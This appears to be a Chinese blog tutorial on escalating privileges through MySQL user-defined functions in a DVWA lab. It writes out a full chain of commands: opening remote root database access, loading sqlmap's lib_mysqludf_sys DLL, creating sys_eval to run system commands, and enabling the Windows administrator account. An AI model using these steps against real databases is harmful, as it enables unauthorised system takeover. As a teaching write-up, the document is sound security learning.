数据库的权限提升

在数据库提权时要注意:

基于组件和软件的提权,提权能提到什么程度取决于组件(数据库)、网站部署时用的什么权限用户部署的。

而操作系统提权时利用系统内核漏洞打的是操作系统,所以没有像这样的运行用户的限制。

UDP提权

所用环境:Win7 + phpstudy + DVWA

简介:UDF是MySQL的一个拓展接口,提供用户自定义函数的功能,可以说是数据库功能的一种扩展。

原理:用户自定义的函数被当作本机函数执行,在使用CREATE FUNCITON调用dll中的函数后,mysql账号转化为system权限,从而实现提权。

复制代码
UDF提权条件:
1.Mysql版本大于5.1版本
2.网站本身存在Getshell漏洞,可以通过Webshell可以将udf.dll上传到Mysql中的lib\plugin目录下
3.掌握的Mysql数据库账号有对Mysql的insert和delete权限以创建和删除函数
4.secure-file-priv参数不为null

1.通过网站漏洞获取一个shell,如webshell

webshell地址:http://192.168.1.4/DVWA/hackable/uploads/test7.php

2.翻配置文件 查找数据库账号密码

找到了 账号:root 密码:root

3.navicat连接数据库

先允许数据库被连接

复制代码
# 允许数据库远程连接
grant all privileges on *.* to "root"@"%" identified by "root";

现在再连接

4.在数据库上做一些操作

复制代码
# Mysql配置文件增加 srcure-file-priv选项
secure_file_priv=
复制代码
新建查询,查询Mysql数据库所在系统位数:64位数
show variables like '%compile%'; 
复制代码
查看plugin目录
show variables like '%plugin%'; 

plugin目录:C:\phpstudy_pro\Extensions\MySQL5.7.26\lib\plugin\

4、制作提权dll

自己写提权dll文件太麻烦了也不会写,我们想要的自定义函数不就是命令执行吗,sqlmap可以去执行命令啊 所以:

sqlmap中一定有编码后的dll文件,路径为:

复制代码
sqlmap\data\udf\mysql\windows\32\lib_mysqludf_sys.dll_
sqlmap\data\udf\mysql\windows\64\lib_mysqludf_sys.dll_

这是个编码后的文件

需要利用cloak.py进行解码获得mysqludf_sys.dll,cloak.py在sqlmap的sqlmap\extra\cloak\目录下

拿出这俩文件 执行以下命令进行解码

复制代码
python cloak.py -d -i lib_mysqludf_sys.dll_

5.将dll文件上传到C:\phpstudy_pro\Extensions\MySQL5.7.26\lib\plugin\目录

Mysql默认安装时没有lib\plugin目录,需要新建

6.创建sys_eval函数,提权

复制代码
create function sys_eval returns string soname 'lib_mysqludf_sys.dll';

7.使用函数进行提权

复制代码
select sys_eval('whoami');

但是为什么提权之后还是普通用户miaos呢?

应为基于组件和软件的提权,提权能提到什么程度取决于组件(数据库)、网站部署时用的什么权限用户部署的。

8.靶机启用administrator 以administrator重启mysql

(1)先以管理员身份运行cmd 执行以下命令启用administrator并设置密码

复制代码
net user administrator /active:yes

net user administrator Aa123456

(2)切换administrator登录 重启mysql

9.再次尝试进行提权

复制代码
select sys_eval('whoami');

成功提升到administrator权限

【重要声明】

本文内容仅用于技术交流与学习,严禁用于任何非法用途。所有操作必须严格遵守《中华人民共和国网络安全法》及相关法律法规,仅在获得明确授权的前提下进行。读者应自行承担操作风险,作者不对任何违规使用或由此引发的法律后果负责。

相关推荐
玩转数据库管理工具FOR DBLENS2 小时前
企业数据架构选型指南:关系型与非关系型数据库的实战抉择
数据库·测试工具·mysql·oracle·架构·nosql
二进制_博客2 小时前
Doris2.x连载文章(2)
数据库·doris·mpp数据库
共享家95272 小时前
Redis背景知识
数据库·redis·缓存
盐焗西兰花2 小时前
鸿蒙学习实战之路-数据持久化键值型数据库KV-Store全攻略
数据库·学习·harmonyos
青春不流名2 小时前
通过geoip自动更新GeoLite2-ASN GeoLite2-City GeoLite2-Country
数据库
Rysxt_2 小时前
IDEA中Git隐藏更改(Stash)功能详解教程
数据库·git·intellij-idea·stash
gugugu.3 小时前
Redis持久化机制详解(二):AOF持久化全解析
数据库·redis·缓存
Hello.Reader3 小时前
Flink SQL 的 RESET 语句一键回到默认配置(SQL CLI 实战)
数据库·sql·flink
摇滚侠3 小时前
Redis 零基础到进阶,Redis 事务,Redis 管道,Redis 发布订阅,笔记47-54
数据库·redis·笔记